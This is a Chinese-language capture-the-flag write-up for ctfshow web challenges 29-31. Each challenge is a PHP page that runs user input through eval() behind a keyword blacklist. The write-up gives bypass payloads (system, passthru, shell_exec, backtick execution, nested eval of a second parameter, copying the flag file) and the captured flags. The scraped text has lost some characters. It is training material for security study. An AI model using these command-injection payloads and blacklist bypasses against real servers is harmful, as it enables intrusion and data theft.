ctfshow-web命令执行 -web29-web77

📅 发布时间:2026/7/10 20:02:18 👁️ 浏览次数:
ctfshow-web命令执行 -web29-web77
eb29eval($c)漏洞(/flag/i)?php /* # -*- coding: utf-8 -*- # Author: h1xa # Date: 2020-09-04 00:12:34 # Last Modified by: h1xa # Last Modified time: 2020-09-04 00:26:48 # email: h1xactfer.com # link: https://ctfer.com */ error_reporting(0); if(isset($_GET[c])){ $c $_GET[c]; if(!preg_match(/flag/i, $c)){ eval($c); } }else{ highlight_file(__FILE__); }!preg_match(/flag/i, $c) 如果输入中包含 flag不区分大小写就禁止执行。 eval() 直接执行你输入的 PHP 代码1、直接执行系统命令?csystem(tac fla*);2内敛执行?cecho tac fl*;3利用参数输入eval?ceval($_GET[1]);1phpinfo();4利用cp命令将flag拷贝到别处csystem(cp fl*g.php a.txt); 然后访问ctfshow{921a5be1-2428-45cb-9eba-b9a9d43a59ef}web30eval($c)漏洞(/flag|system|php/i)?php /* # -*- coding: utf-8 -*- # Author: h1xa # Date: 2020-09-04 00:12:34 # Last Modified by: h1xa # Last Modified time: 2020-09-04 00:42:26 # email: h1xactfer.com # link: https://ctfer.com */ error_reporting(0); if(isset($_GET[c])){ $c $_GET[c]; if(!preg_match(/flag|system|php/i, $c)){ eval($c); } }else{ highlight_file(__FILE__); }exp内敛执行?cecho tac fl*;ctfshow{df3c4621-c51b-42e3-a0a1-64812e40ae28}passthru这是 PHP 的一个函数作用是执行系统命令并将输出直接返回给浏览器。?cpassthru(tac fla*);字符串拼接字符串拼接的方式动态构造出函数名 system然后执行系统命令 tac fla*shell_exec?cecho shell_exec(tac fla*);二阶注入式 RCE?ceval($_GET[1]);1system(tac fla*);ctfshow{df3c4621-c51b-42e3-a0a1-64812e40ae28}web31/flag|system|php|cat|sort|shell|.| |/i?php /* # -*- coding: utf-8 -*- # Author: h1xa # Date: 2020-09-04 00:12:34 # Last Modified by: h1xa # Last Modified time: 2020-09-04 00:49:10 # email: h1xactfer.com # link: https://ctfer.com */ error_reporting(0); if(isset($_GET[c])){ $c $_GET[c]; if(!preg_match(/flag|system|php|cat|sort|shell|\.| |\/i, $c)){ eval($c); } }else{ highlight_file(__FILE__); }二阶注入式 RCE?ceval($_GET[1]);1system(tac fla*);